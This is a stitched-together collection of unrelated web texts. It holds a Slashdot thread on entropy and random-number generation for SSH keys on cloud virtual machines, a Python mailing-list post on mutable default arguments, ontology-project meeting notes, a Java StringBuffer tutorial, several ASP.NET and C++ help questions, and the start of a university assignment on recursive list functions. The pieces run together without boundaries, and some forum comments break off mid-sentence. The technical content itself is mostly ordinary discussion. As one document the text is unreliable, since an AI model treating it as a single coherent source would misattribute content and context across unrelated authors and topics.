The microphone noise is louder, but it's much harder to determine how much secure entropy is present. Why trust it when you don't have to? There's plenty available for most purposes without it. The Turbid [av8n.com] program does this in an efficient and secure manner (and they have a paper discussing the details, along with the relevant proofs, for the curious). Re: (Score:2) That's even worse than the microphone idea -- every server and VM within 20 miles of you would have the same source for "random" data. And that's ignoring the fact that clouds aren't random at all; they change in very well-understood ways given the wind, humidity, temperature, etc. The path, shape and density of clouds can be predicted in general terms a week in advance, and pretty specifically over the course of a few minutes. Re: (Score:2) While you are right that using these methods for realtime key generation could be predictable gene Re: (Score:2) You're assuming that more noise is equivalent to more entropy -- that may or may not be true. People typically walk at a fairly even cadence, speak in a certain frequency range. Traffic noise has a predictable Doppler shift and fairly well-characterized frequency distribution. And most importantly, the data isn't secret so someone else could just slap up a second mic next to yours and record the data. Regardless, it's far from an optimal solution even if you assume that no dedicated hardware RNG is available. Re: (Score:2) Re: (Score:2) They do? It's secure crypto hardware.. what's evil about that? Yes you have scary evil like Palladium but you don't have to install it if you don't want to. And if machines take control you can always disable the device from the BIOS.. (given you don't care about any data which has encryption keys stored only in the module) Re: (Score:2) Re:Another advantage for TPM chips...
(Score:4, Informative) Most of the RNG chips publish pretty good specifications on the design of their entropy source, the amount of real entropy it provides, and the circumstances in which that entropy level might be reduced. There could be implementation or production errors or course, just like there could be runtime or compiler errors with software, but the design is available for perusal and has been analyzed. For example, the Intel 82802: [cryptography.com] Re: (Score:2) That's not true of TPM chips, whose insides are secret (unless you have a SEM.) Re: (Score:2) Black box testing isn't all that productive for RNGs. You can check distribution and very simple patterns, but beyond that it's a major headache. White box testing makes things much easier. Yay source code! Good luck for testing the validity of a random generator from source code. This is major Ju-Ju. Generated randomness is deep black majick. It's *waaaay* simpler and efficient to just test the output over a few X runs for a very large X. That's not to say that source code isn't useful to check for glaring mistakes, but if you want to check the validity of an algorithm by looking at it, you'd better be a professional mathematician with specific interests. Re: (Score:2) Re: (Score:2) Re: (Score:2) Re: (Score:2, Insightful) > There's no reason the host can't export that same /dev/random to the guest; > certainly to ensure there is sufficient entropy on startup. Wouldn't the low-budget solution to this entire issue be the simple deferral of SSH key creation and the like for a few minutes past the initial boot-up? Getting creative (Score:3, Interesting) Re:Getting creative (Score:4, Funny) Well, clearly that "Linux" thing is a toxic gas weapon being used by the reds. Ya, I'd worry about them blowing up a chemical weapon in the clouds. They obviously got the technology from the Nazi's (no, not a candidate for Godwin's law). 
I don't know about you, but I'm grabbing my M1 Garand and heading down to the shelter under the house. Once that Linux stuff clears, they'd better have thought twice about attackin' my good ol' US of A. Well, you asked what they would have thought 50 years ago, didn't you? :) Re:Getting creative (Score:5, Interesting) There's little solid matter left. Nobody really knows why; the legends tell of ancient, sprawling empires releasing great monsters that consume worlds and deliver energy to fuel their eons-old wars in the cold between the stars. Several human colonies survived the Last Scourge. One even knew something of their people's history. This colony of merchant-scholars thrived in an old space-borne city drifting about a great lightyears-long dust cloud inexplicably left untouched by the wars. The city was old, very old, built by a generation of master engineers who etched their likenesses in the great canvases of the city's impervious white construction. Quiet machinery lurked untouched in the mysterious depths of the undercity, seen only by outcasts wandering alone through those vast echoing chambers. The city provided everything the civilization needed. Somehow (so much seemed like magic to them that even the usually-curious humans grew bored of speculation) their reservoirs filled with water, their air recycled, and their waste disappeared down bottomless shafts. All of their needs were filled, but they craved expansion and exploration. They were able to harvest some limited chemical energy from the food supplied by the city, and build using scrap. Still, entropy was a problem in the dust cloud of Linux. Re: (Score:2) I'll bite. That's an interesting story. Where's it from?
(Score:3, Interesting) Why can't the CPU contain a register which holds a random number which is updated with every clock cycle? Re: (Score:3, Insightful) Re:Why is this done in software at all? (Score:5, Insightful) Re:Why is this done in software at all? (Score:5, Informative) First, the cost of computing truly random numbers is way too high for that, unless you are performing an iterative approach to random number generation (and then you have the problem of predictability). It could be done, but you'd be pumping a lot of hardware into computing values that would be thrown away 99.9%+ of the time. Secondarily, if your PRNG algorithm is broken, you're stuck replacing the hardware. At least a bad software PRNG can be replaced. That said, hardware PRNG is provided in many modern systems by a TPM [wikipedia.org]. It lacks the performance problems associated with your solution, since it only generates random numbers on demand. It still has the problem of a potential exploit being discovered leading to expensive hardware upgrades, but to my knowledge that has not been a problem to date. Re:Why is this done in software at all? (Score:4, Insightful) Why can't the CPU contain a register which holds a random number which is updated with every clock cycle? First, the cost of computing truly random numbers is way too high for that Computers are deterministic. Truly random numbers cannot be computed, they can only be provided by special hardware (something that can measure shot noise or thermal noise, a camera pointed at a lava lamp, a movement detector in Schrodinger's cat's box). Secondarily, if your PRNG algorithm is broken, you're stuck replacing the hardware. That's why you don't do pseudo-random numbers, but real randomness from thermal noise or shot noise or some other quantum effect (cats and lava lamps don't fit on ICs). That said, hardware PRNG is provided in many modern systems by a TPM. 
And at some level, the randomness generator on the TPM almost certainly has an interface of "read this special register every X clock cycles" (because how else would you interface with your special hardware?). It lacks the performance problems associated with your solution, since it only generates random numbers on demand. If it's implemented in hardware (as it must be, to get true randomness), it's always running and there is no "on demand". It still has the problem of a potential exploit being discovered leading to expensive hardware upgrades, but to my knowledge that has not been a problem to date. That would be because it's a RNG instead of a PRNG. Re: (Score:2) That's why you don't do pseudo-random numbers, but real randomness from thermal noise or shot noise or some other quantum effect (cats and lava lamps don't fit on ICs). A small radiation source/detector, like the ones in smoke detectors, can work just fine for this purpose. Since radiation is the result of quantum interactions, the output is truly random due to the nature of the universe. Re: (Score:2) Re: (Score:2) Only if you demand perfect randomness (for which there is little practical use in typical computers). And even then "perfect" only means "perfectly preserving randomness" not "correctly detecting every single event/non-event". Given the relative simplicity of a radiation detector "perfect" or some very close equivalent thereto is probably not all that unrealistic anyway. Re:Why is this done in software at all? (Score:4, Interesting) Why can't the CPU contain a register which holds a random number which is updated with every clock cycle? Some do have something like that [via.com.tw], although it's only about 800kbps instead of 4 bytes per cycle. Re: (Score:2) There are CPUs (or more often, chipsets) that provide RNGs, along with a few other hardware implementations of crypto algorithms. Most of them are meant for smaller computers, though, like the VIA C3. 
I wish they were more widespread and used.

Re: (Score:2)

Many do. VIA has had CPU-integrated dual-oscillator hardware RNGs for a long time. Intel firmware hubs also commonly contain a hardware RNG, as do other motherboard architectures. They aren't very fast sources of random data -- it's actually pretty hard to get truly random data, even outside the world of desktop CPUs -- but they are fast enough to provide a relatively long seed for a PRNG within seconds of boot. Assuming you use a reasonable PRNG, providing a truly random seed is sufficient to let the PRNG g

Surely Not. (Score:3, Insightful)

Generating SSH keys involves interaction via at least keyboard and possibly mouse at a terminal. Surely that basic premise is enough to provide enough entropy for the pseudo-random generator. Also, the date and time (as sources of random) can't be virtualized of course.

Not surely (Score:4, Interesting)

Generating SSH keys involves interaction via at least keyboard and possibly mouse at a terminal.

SSH host keys are often generated automatically when the init script notices there aren't any.

Re: (Score:2)

Generating SSH keys involves interaction via at least keyboard and possibly mouse at a terminal.

If you use PuTTY, yes. OpenSSH, at least, doesn't require anything in particular, just a sufficient amount of entropy. On a properly configured system, moving a mouse or banging randomly on the keyboard might feed entropy -- but then, so would plugging a microphone into the sound card, or any number of other things. And as Kaseijin mentions, this is about host keys. Especially in a virtualized environment, you can't assume any sort of human interaction when these keys are generated.

Re: (Score:2)

Last I checked the date and time are anything but random.

Much ado about nothing. (Score:5, Funny)

All this complaining over random numbers is silly. All you really have to do is use 5. It's just as random as any other number, and it's easy to generate a 5.
-Taylor

Re: (Score:2)

"and it's easy to generate a 5"

And you can generate it at any random point in time too. But somehow, being as random as anyone else, I prefer 42.

Re:Much ado about nothing. (Score:5, Funny)

This only proves how easy it is to generate a (5, Funny).

Re: (Score:3, Funny)

int getRandomNumber()
{
    return 4; // chosen by fair dice roll.
              // guaranteed to be random.
}

Re: (Score:2)

[xkcd.com] Probably obvious to everyone - just to make sure Mr. Munroe gets the credits he deserves.

Re: (Score:2)

It's cool, it's different because you used a 5.

Re: (Score:2)

No, the only true random number is 17. This was asserted by several mathematicians who used several lines of reasoning (one rather like this [flickr.com]). Then you get the random sequence 17,17,17... and the random rational 0.17171717... and lots of other perfectly good random numbers. Though you probably shouldn't use them as a source for cryptographically strong random numbers.

Re: (Score:3, Insightful)

Interesting that both Dilbert (years ago) and xkcd (more recently) contain a comic with a similar joke...

Re: (Score:2)

Hell! I have been using 42 for a long time. And you know that's the Answer to Life, The Universe and Everything, including but not limited to generating Random Numbers, I suppose. I bet it works better than 5.

Big problem, but addressable (Score:4, Interesting)

Java code that does cryptography or generates UUIDs (in the hope that they will be a truly universal key for something) operates under similar problems. JavaScript is even worse; all it has is the time, perhaps the user's window-size (not very random if maximised) and mouse-movements, and the built-in random() method, which is not expected to be of cryptographic quality.

Re: (Score:2)

Interesting idea, though I would recommend HTTPS (a pre-shared self-signed cert would be sufficient for in-house use). If predictability is the problem you're trying to avoid, you want to skirt the packet sniffers.
By the way, why write to /dev/urandom, and not /dev/random? Doesn't /dev/urandom act as a front for /dev/random except when the entropy pool is empty (at which point it goes pseudo-random)? Just curious.

Re:Big problem, but addressable (Score:5, Informative)

If you write. The only possible solution is for the hypervisor (Xen for Amazon) to provide a simulated HW RNG that pulls entropy from a real HW RNG or from an entropy daemon in the hypervisor. The best way to learn about Linux RNG basics is Gutterman et. al. Analysis of the Linux Random Number Generator [iacr.org]. Several of the issues they describe have been addressed, such as their PFS concerns, but their description of the entropy pools is still accurate.

Re: (Score:2)

Dang, you're right. Thanks for the post.

Re:

If we're talking about a VM, what's wrong with setting up a point-to-point link with the host machine and accessing an entropy source over that?

Linux has a paravirtual entropy driver (Score:5, Insightful)

CONFIG_HW_RANDOM_VIRTIO enables it. It's been there for quite a while. We could easily support it in KVM but I've held back on it because to really solve the problem, you would need to use /dev/random as an entropy source. I've always been a bit concerned that one VM could starve another by aggressively consuming entropy. lguest does support this backend device though.

Re: (Score:2)

I guess you could set it as an option, but the threshold between a useful amount of entropy and what it would take to starve another is often overlapping, so it wouldn't be much help in any but the most controlled situations--which is exactly when you wouldn't need the option.

Re: (Score:2)

I don't understand how entropy consumption is fundamentally different than I/O consumption or memory consumption, or why it would need a different solution to the problem of competing demands for scarce resources.
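The /dev/random-versus-/dev/urandom question above has a practical upshot: userspace usually doesn't need to open the devices by hand. A minimal sketch (Python, assuming a Unix-like guest) of pulling bytes from the kernel's pool:

```python
import os

# os.urandom() reads from the kernel CSPRNG (the pool behind
# /dev/urandom on Linux), so it does not block waiting for entropy.
seed = os.urandom(16)
print(len(seed))             # number of bytes obtained

# Two independent draws should never repeat in practice.
print(os.urandom(16) == seed)
```

Whether those bytes are trustworthy on a freshly cloned VM is exactly the thread's point: the kernel pool is only as good as the entropy it has been fed since boot.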
Re: (Score:2) Wouldn't it be sufficient to use the host random pool as a seed for some sort of strong PRNG? Re: (Score:3, Funny) I heard the aliens from zeta reticuli utilize paravirtual entropy drivers to get to earth. Re: (Score:2) try scaling that up, and see where it ends up... evidence that cloud is a fad? (Score:2, Interesting) Re: (Score:3, Insightful) It is a tool in the bucket. That what it is. There will be a huge growth spurt, then they realize that it won't solve everything. Then they will cut back and still use it until they find something better. Support via "Guest Additions"? (Score:2, Insightful) Eh? (Score:4, Interesting) If you "need" cloud computing, then you're bright enough to install an entropy daemon on one of the machines and maybe even slap a hardware-based RNG on it (probably worth sourcing a VIA or similar just for this purpose, to be honest). It's not hard. Anything else, your "randomness" really doesn't matter and the standard entropy will be just fine. Re: (Score:2) Re: (Score:3, Insightful) A bold assertion. I assume you're thinking of TCP sequence numbers or similar. Otherwise, I call bullshit on the "ANY". And the entropy provided by being connected to a network in any way, shape or form is enough for that purpose. Even in general, unless you're generating LOTS of SSH/SSL keys on some kind of automated process schedule, you're fine, and that's the sort of task that should be pushed out to a dedicated entropy machine. Otherwise, every ADSL router etc. in the WORLD would be worthless - no keybo Re: (Score:2) If you "need" cloud computing, then you're bright enough to install an entropy daemon on one of the machines and maybe even slap a hardware-based RNG on it (probably worth sourcing a VIA or similar just for this purpose, to be honest). It's not hard. Err... yes, it is. Where does your entropy daemon get its entropy from? 
How do you install the hardware given that you're running in a VM hosted on somebody else's machine, located in somebody else's datacentre? This is an issue that can only be solved by the

No one wants to make money off the Interwebs! (Score:3, Insightful)

Yes. Because no one on the Internet has any use for gathering venture capital or selling products. It IS an overused term, but you're not testing some product or how people are using it, you're really just testing the security models of various operating systems to determine which are more ready to support those concepts that people grouped together and called "cloud computing". There were a lot of various concepts that were grouped together that comprised the "Net 2.0" concept too...and that cliche was just as derided for being overused. And yet, websites that aren't all ajaxed up or don't use css seem pretty old-fashioned these days. That said, the question I have is how ready for those "cloud computing" concepts is Windows, really? How much of that security model is using the proper approach to securing a transaction instead of just shutting down that path altogether?

Definition of Cloud skewed (Score:2, Informative)

Re: (Score:2)

While the origin of the issue is the virtualization layer, it is more specifically a cloud problem because most IaaS/VPS providers use standard images with a public random seed file, so everybody's machine initializes up to the same state (RTC + random seed + handful of interrupts).

Re: (Score:3, Informative)

This is not a "cloud" problem. This is a virtual server and image problem. Clouds have nothing to do with virtual servers. If you use a service like NewServers.com, you can get dedicated physical servers for your cloud, on-demand and at hourly prices. Expanding on the other answer you've gotten, here's the basic problem: I can take a virtual server, install an image with a well-known PRNG seed in it, and use it for a little while.
While it's used the PRNG is updated by entropy in an unpredictable way, resulting eve

GoDaddy VPS - SSH keys identical (Score:2)

Re: (Score:2)

Does this happen every time or just at random? (Excuse the pun.)

FTA... (Score:5, Funny)

I'm glad he cleared that up for me.

Re: (Score:2)

So, it resembles an act of Congress then. (Although one could argue that by simultaneously fulfilling both opposing states, Congress is more like a quantum computing machine.)

HotBits random number generator (Score:2)

There's a simple random number generator based on a radioactive source [fourmilab.ch] on-line. That can be accessed through a Java app, and the hardware info needed to build one of your own is on line. There are commercial random number generators. [comscire.com] USB, even. A serious data center should have a few of these.

May also affect IP sequence number generation (Score:2)

Running nmap against the same host but the physical OS (currently FC-11) gives:

The generation of random numbers... (Score:5, Funny)

As has been so often said, the generation of random numbers is too important to be left to chance. :-)

Old hat? (Score:4, Informative)

Disclaimer: I work for a hosting company doing VPS/cloud hosting. This is pretty old-hat. First, the host-keys issue inside pre-generated images is a very obvious one, although I'm not too surprised that companies aren't considering it. RNG issues aren't quite as obvious, but they're not super-secret either; anyone with any amount of background in security has been aware of this for a while. In fact, questions regarding RNGs have even surfaced in the ##xen IRC channel (freenode.org) because it is a very important issue to some. In particular, those with the need for hardware RNG solutions have come seeking assistance. I'm certainly not minimizing the issue, just noting that it isn't really a new one at all. More than anything, the point is that the average systems administrator has been slow to realize this, and developers have been even slower.
problem has been solved (Score:3, Informative)

Any app that cares about randomness and security (Score:2)

...should be importing it explicitly (eg to create important crypto keys) from an external source, such as random.hd.org (mine) or random.org or whatever. Rgds Damon

Use Linux-VServer/OpenVZ or LXC (Score:3, Informative)

Those just use process-namespaces and the same kernel and you are done with it.

Re:Doesn't SSH use OpenSSL? (Score:5, Informative)

OpenSSL has a cryptographically secure random number generator. I know not everything uses it but doesn't (Open)SSH?

No. By default, OpenSSH will use the system's pseudo-random number generator, but you can also make it use prngd [sourceforge.net] or EGD (the Entropy Gathering Daemon) instead. Whether either are more "secure" than the kernel's built-in RNG I am not qualified to say.

Hardware support.... (Score:2)

Whether either are more "secure" than the kernel's built-in RNG I am not qualified to say.

Well, it depends on the hardware, as the kernel has drivers for the various hardware RNGs featured on some CPUs, or for a virtualized source of randomness provided by the host.

Re: (Score:2)

Um, the article is discussing multiple virtual machines with identical disk images, so "hardware support" is moot.

Re: (Score:2)

Troll!? Whoever modded me troll has to have a look at Avogadro's number and its relationship with this thread.

Re: (Score:2)

Like Web 2.0, it has at least one or two specific meanings. The problem is getting specific -- a little knowledge is a dangerous thing, and managers can be very fuzzy (clouded?) about "cloud computing" if they don't understand the difference between calling Gmail a "cloud app" and calling Amazon Web Services a "compute cloud".

Re: (Score:2)

Cloud computing is real, and some of the biggest computers in the world are devoted to it. Climate modeling is a very difficult problem and we still don't have it nearly right.

Re: (Score:2)

Cloud computing is real[...]

Point was it is not well defined.
It's like "architecture" or "web 2.0" or "beautiful": everybody knows exactly what it means - but everybody has a different idea of what it is...

Re: (Score:2)

is that it doesn't exist. It's a farce, a meaningless buzzword, just like web 2.0. A more appropriate word would be servers.

You miss the point. We aren't talking about servers, and any ordinary server-provision system wouldn't have the problem highlighted in TFA. We are talking about servers that are initialised on-demand, with a pay-by-the-hour pricing model, so that individual OS installations typically only run for a few hours at a time before being shut down and essentially wiped back to the base insta

Re: (Score:2)

The host CPU's TSC register would probably be an excellent source. Actually, if 636086 reads the xen mailing lists then it's probably a subtle joke.

Re: (Score:2)

well... i screwed up and got my threading mixed up so I thought you'd replied to a different post. d'oh. All I was saying is that based on recent discussions on xen-devel concerning TSC synchronisation when physical CPUs are scheduled into virtual CPUs in a VM, the value might as well be a random number for the amount of use that it is. I assumed you were making a joke about that, but obviously you were replying to a different post than I thought you were.

Re: (Score:2)

A book of random numbers is great for statistics. If that's your use there's no need to do anything else, and RAND's book is still a good choice. But the value of random numbers in things like cryptography is that they are unpredictable. If everyone is using the same list the numbers are entirely predictable and therefore useless. A typical example is the hybrid cryptosystem used in public-key encryption -- the computer picks a random number for use as the secret key for the shared-secret cypher, encrypts th

Re: (Score:2)

As part of cloning the image just do this:

dd if=/dev/urandom of=/target/var/lib/urandom count=1 bs=4096

There. Fixed it for you.
Works better if the VM server has a high volume entropy source, but even if not it is still pretty damn good. Except this is somewhat harder to do if you're running a service where you provide virtual machines that run OS images from unknown sources, that could be running basically any OS/distribution the user wishes, with the image using practically any file system that has ever be
Re: what does 'a=b=c=[]' do

- From: Rolf Camps <rolf@xxxxxxx>
- Date: Thu, 22 Dec 2011 09:51:54 +0100

alex23 wrote on Wed 21-12-2011 at 16:50 [-0800]:

I'm afraid it's dangerous to encourage the use of '[]' as the default value of a parameter in a function definition. If you use the function several times, the default always points to the same list.

>>> def return_list(list_ = []):
...     return list_
>>> a_list = return_list()
>>> a_list
[]
>>> a_list.append(3)
>>> a_list
[3]
>>> b_list = return_list()
>>> b_list
[3]    # !!??

>>> def return_list():
...     return []
>>> a_list = return_list()
>>> a_list
[]
>>> a_list.append(3)
>>> a_list
[3]
>>> b_list = return_list()
>>> b_list
[]    # OK!

I only use python3 so I don't know how these things work in other versions. No problem in your function since you yield a copy, but I've already seen long threads about this. I would change your function to (Python3.x):

def empty_lists(count):
    for _ in range(count):
        yield []

Regards,

Rolf
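Rolf's warning above is the classic mutable-default-argument trap: the `[]` is evaluated once, at `def` time, and shared across calls. The usual idiom (a sketch, not taken from the thread) is a `None` sentinel, so a fresh list is created on each call:

```python
def return_list(list_=None):
    # A default of [] would be created once at def-time and shared;
    # the None sentinel defers list creation to call time instead.
    if list_ is None:
        list_ = []
    return list_

a_list = return_list()
a_list.append(3)
b_list = return_list()
print(b_list)  # [] -- no longer shares state with a_list
```

This is why linters flag mutable default values: the sentinel keeps the convenient keyword-argument interface without the shared state.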
latest version of OBI: how to use SVN:

agenda:
- release starting this week: please be extra careful when editing
- agreement to go ahead with release; MC will check with PRS and SAS about MSI terms
- from coord: terms from non-OBI namespaces (NMR, CHROM) will be removed for this release

From Coord: working on Namespaces policy:
- For the current terms, the decision is: if we manage to translate definition source to OBO we will go ahead and put everything under the OBI ns
- AI for PRS and MC to check on OBO format for next week
- PRS and FG to work on policy for ns when joining OBI - circulate draft for comments and put up for voting, then add to the wiki
- import of IAO -> need lock on files (touches all of them); the terms will replace DENRIE and part of the plan branch; OBI work and sourcing credit will be preserved, but the IDs will change

MC has run the reasoner and the terms are consistent; however, there are duplicates, for example data format specification.

Manuscript will be submitted to Nature Biotech.

AI JF - find out where the current version is and how we edit it

JF volunteered to lead the next dev call.

Melanie, can you please update the wiki with these notes unless someone objects? thanks!

Jennifer Fostel, Ph.D.
CEBS Scientific Administrator
Global Health Sector, SRA International, Inc
Laboratory of Respiratory Biology
NIEHS, NIH
PO Box 12233 Mail Drop F1-05
111 Alexander Drive
Research Triangle Park NC 27709-2233
phone 919 541 5055

I will offer to run the call today. What are agenda items to discuss? ...jennifer

-----Original Message-----
From: Bjoern Peters [mailto:bpeters@...]
Sent: Wednesday, November 19, 2008 10:14 AM
To: OBI Developers
Subject: [Obi-devel] can't make call today

Also: we have neglected to assign people to run the dev calls in the past weeks. If someone would volunteer for today, that would be great.
Going forward, I would like to exclude myself from running dev calls, as I already do the coord ones.
The StringBuffer class in Java is used to create mutable strings. It lives in the java.lang package (so no import is needed) and provides methods that directly manipulate the character data inside the object.

Creating a StringBuffer Object:

There are two ways to create a StringBuffer object.

1. We can create a StringBuffer object using the new operator, passing the string to the constructor:

StringBuffer sb = new StringBuffer("Hello");

2. Another way is to first allocate an empty StringBuffer object using the new operator and store a string into it later:

StringBuffer sb = new StringBuffer();

When created like this, the StringBuffer object allocates an initial capacity of 16 characters; the capacity grows automatically when required.

Commonly Used Methods

1. s1.setCharAt(n,'x') - Replaces the nth character with 'x'
2. s1.append(s2) - Appends the string s2 to s1 at the end
3. s1.setLength(n) - Sets the string length to n
4. s1.insert(n,s2) - Inserts the string s2 at position n in string s1

Example program

import java.util.*;
import java.lang.*;
import java.io.*;

class SBDemo
{
    public static void main(String[] args)
    {
        StringBuffer sb = new StringBuffer("object Oriented");
        System.out.println("Original String is:" + sb);
        System.out.println("length of String is:" + sb.length());
        sb.setCharAt(6, '-');                      // replacing the character at index 6
        StringBuffer s2 = new StringBuffer(" language");
        sb.insert(15, s2);                         // inserting the string at index 15
        System.out.println("Modified String is:" + sb);
    }
}

Output:

D:\java examples>javac SBDemo.java
D:\java examples>java SBDemo
Original String is:object Oriented
length of String is:15
Modified String is:object-Oriented language
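For readers coming from Python, where strings are likewise immutable, a rough counterpart to the StringBuffer example above. The io.StringIO usage and the slicing trick are my own illustration, not part of the tutorial:

```python
import io

# Python strings are immutable; io.StringIO plays the role of a
# mutable buffer for building strings incrementally.
buf = io.StringIO()
buf.write("object Oriented")
s = buf.getvalue()

# Emulate setCharAt(6, '-'): rebuild with the character replaced.
s = s[:6] + "-" + s[7:]

# Emulate insert(15, " language"): plain concatenation at the end.
s += " language"
print(s)  # object-Oriented language
```

In practice Python code builds strings with `str.join` on a list of parts; StringIO is closest in spirit to an append-oriented buffer.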
Hi.. I searched a lot on the net but couldn't find a solution, so I thought to ask here. I want to change the default namespaces in VS2010. When I create an ASP.NET website, by default I get these namespaces in the .cs file of the webform:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;

But I want the System.Data namespace added by default whenever I add any new website. Is there any solution?

Folks, I have 5 tabs in my master page application. How can I make the 2nd tab the default? Any ideas? Thanks,

I have a standard Document Library where I uploaded various kinds of files (.pdf, .swf). Whenever I click on an item (or paste its direct link into the browser) it prompts me to download it instead of opening it in the browser directly (with Flash Player or Acrobat, in my example). How do I obtain the desired behavior? Thanks.

In Visual Studio, when I run the project it displays the Default.aspx page. Now I want it to display mypage.aspx when I run the project. How do I set that? Help me!
Hello. I have a question regarding the function length(). I want to find out the length of the string that is inputted by the user. When I use the length() function it only counts the characters from the first word. Can somebody please take a look at my code and determine why it is only outputting the number of characters from the first word? For example: when the user inputs "hello" my program outputs 5; when the user inputs "hello world" the program still outputs 5.

#include <iostream>
#include <fstream>
#include <string>
#include <cctype>
#include <cstdio>
using namespace std;

int main()
{
    string sentence;
    cout << "please enter a string: " << endl;
    cin >> sentence;
    int length = sentence.length();
    cout << length;
    cin.get();
}
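The behaviour the poster is fighting is that `cin >> sentence` stops at the first whitespace, so only "hello" is ever stored; the usual C++ fix is `std::getline(cin, sentence)`, which reads the whole line. A quick Python sketch of the two behaviours, for comparison:

```python
# A full line, spaces included, as std::getline (or Python's input())
# would return it; hard-coded here instead of read interactively.
sentence = "hello world"
print(len(sentence))  # 11: five letters + a space + five letters

# The stream-extraction behaviour: first whitespace-delimited token only.
first_word = sentence.split()[0]
print(len(first_word))  # 5, which is what the poster's program printed
```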
Project 2: Recursive Data Structures
EECS 280 Winter 2011
Due: Tuesday, February 8th, 11:59 PM

Introduction

This project will give you experience writing recursive functions that operate on recursively-defined data structures and mathematical abstractions.

Lists

A "list" is a sequence of zero or more numbers in no particular order. A list is well formed if:

a) It is the empty list, or
b) It is an integer followed by a well-formed list.

A list is an example of a linear-recursive structure: it is "recursive" because the definition refers to itself. It is "linear" because there is only one such reference. Here are some examples of well-formed lists:

( 1 2 3 4 ) // a list of four elements
( 1 2 4 )   // a list of three elements
( )         // a list of zero elements--the empty list

The file recursive.h defines the type "list_t" and the following operations on lists:

bool list_isEmpty(list_t list);
// EFFECTS: returns true if list is empty, false otherwise

list_t list_make();
// EFFECTS: returns an empty list.

list_t list_make(int elt, list_t list);
// EFFECTS: given the list (list) make a new list consisting of
//          the new element followed by the elements of the
//          original list.

int list_first(list_t list);
// REQUIRES: list is not empty
// EFFECTS: returns the first element of list

list_t list_rest(list_t list);
// REQUIRES: list is not empty
// EFFECTS: returns the list containing all but the first element
//          of list

void list_print(list_t list);
// MODIFIES: cout
// EFFECTS: prints list to cout.

Note: list_first and list_rest are both partial functions; their EFFECTS clauses are only valid for non-empty lists. To help you in writing your code, these functions actually check to see if their lists are empty or not--if they are passed an empty list, they fail gracefully by warning you and exiting; if you are running your program under the debugger, it will stop at the exit point. Note that such checking is not required!
It would be perfectly acceptable to write these in such a way that they fail quite ungracefully if passed empty lists. Note also that list_make is an overloaded function - if called with no arguments, it produces an empty list. If called with an element and a list, it combines them.

Given this list_t interface, you will write the following list processing procedures. Each of these procedures must be tail recursive. For full credit, your routines must provide the correct result and provide an implementation that is tail-recursive. In writing these functions, you may use only recursion and selection. You are NOT allowed to use goto, for, while, or do-while, nor are you allowed to use global variables.

Remember: a tail-recursive function is one in which the recursive call happens absent any pending computation in the caller. For example, the following is a tail-recursive implementation of factorial:

static int factorial_helper(int n, int result)
// REQUIRES: n >= 0
// EFFECTS: computes result * n!
{
    if (!n) {
        return result;
    } else {
        return factorial_helper(n-1, n*result);
    }
}

int factorial_tail(int n)
// REQUIRES: n >= 0
// EFFECTS: computes n!
{
    return factorial_helper(n, 1);
}

Notice that the return value from the recursive call to factorial_helper() is only returned again---it is not used in any local computation, nor are there any steps left after the recursive call. The tail-recursive version of factorial requires a helper function. This is common, but not always necessary. If you define any helper functions, be sure to declare them "static", so that they are not visible outside your program file. This will prevent any name conflicts in case you give a function the same name as one in the test harness. The function factorial_helper, above, is defined as a static function.

As another example, the following is *not* tail-recursive:

int factorial(int n)
// REQUIRES: n >= 0
// EFFECTS: computes n!
{
    if (!n) {
        return 1;
    } else {
        return (n * factorial(n-1));
    }
}

Notice that the return value of the recursive call to factorial is used in a computation in the caller---namely, it is multiplied by n.

Here are the functions you are to implement. There are several of them, but many of them are similar to one another, and the longest is at most tens of lines of code, including support functions.

int sum(list_t list);
/*
// EFFECTS: returns the sum of each element in list,
//          zero if the list is empty.
*/

int product(list_t list);
/*
// EFFECTS: returns the product of each element in list,
//          one if the list is empty.
*/

int accumulate(list_t list, int (*fn)(int, int), int identity);
/*
// REQUIRES: fn must be associative.
// EFFECTS: return identity if list is empty
//          return fn(list_first(list),
//                    accumulate(list_rest(list), fn, identity))
//          otherwise.
//
// For example, if you have the following function:
//
//     int add(int x, int y);
//
// Then the following invocation returns the sum of all elements:
//
//     accumulate(list, add, 0);
//
// The "identity" argument is typically the value for which
// fn(X, identity) == X, for any X.
*/

list_t reverse(list_t list);
/*
// EFFECTS: returns the reverse of list
//
// For example: the reverse of ( 3 2 1 ) is ( 1 2 3 )
*/

list_t append(list_t first, list_t second);
/*
// EFFECTS: returns the list (first second)
*/

list_t filter_odd(list_t list);
/*
// EFFECTS: returns a new list containing only the elements of the
//          original list which are odd in value, in the order in
//          which they appeared in list.
//
// For example, if you applied filter_odd to the list ( 4 1 3 0 )
// you would get the list ( 1 3 )
*/

list_t filter_even(list_t list);
/*
// EFFECTS: returns a new list containing only the elements of the
//          original list which are even in value, in the order in
//          which they appeared in list.
//
// For example, if you applied filter_even to the list ( 4 1 3 0 )
// you would get the list ( 4 0 )
*/

list_t filter(list_t list, bool (*fn)(int));
/*
// EFFECTS: returns a list containing precisely the elements of
//          list for which the predicate fn() evaluates to true,
//          in the order in which they appeared in list.
*/

list_t rotate(list_t list, unsigned int n);
/*
// EFFECTS: returns a list equal to the original list with the
//          first element moved to the end of the list n times.
//
// For example, rotate(( 1, 2, 3, 4 ), 2) yields ( 3, 4, 1, 2 )
*/

list_t insert_list(list_t first, list_t second, unsigned int n);
/*
// REQUIRES: n <= the number of elements in first
// EFFECTS: returns a list comprising the first n elements of
//          "first", followed by all elements of "second",
//          followed by any remaining elements of "first".
//
// For example: insert (( 1 2 3 ), ( 4 5 6 ), 2)
//              is ( 1 2 4 5 6 3 ).
*/

list_t chop(list_t l, unsigned int n);
/*
// REQUIRES: l has at least n elements
// EFFECTS: returns the list equal to l without its last n
//          elements
*/

Fibonacci numbers

Not all recursive definitions are necessarily linear-recursive. For example, consider the Fibonacci numbers:

fib(0) = 0;
fib(1) = 1;
fib(n) = fib(n-1) + fib(n-2);  (n > 1)

This is called a "tree-recursive" definition; the definition of fib(N) refers to fib() twice. You can see why this is so by drawing a picture of evaluating fib(3):

            fib(3)
           /      \
      fib(2)   +   fib(1)
      /    \         |
 fib(0) + fib(1)     1
    |       |
    0       1

The call pattern forms a tree. You are to write two versions of fib(), as follows. The first one should be written recursively, in this tree pattern. It should not be tail-recursive (and so should not call the second!).
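To make the tree-recursive shape concrete before tackling the C++ version, here is a throwaway Python sketch of the first (non-tail-recursive) fib described above:

```python
def fib(n):
    # Two self-references per call: the "tree" in tree recursion.
    if n < 2:
        return n              # fib(0) = 0, fib(1) = 1
    return fib(n - 1) + fib(n - 2)

print(fib(3))  # 2, matching the hand evaluation of fib(3) above
```

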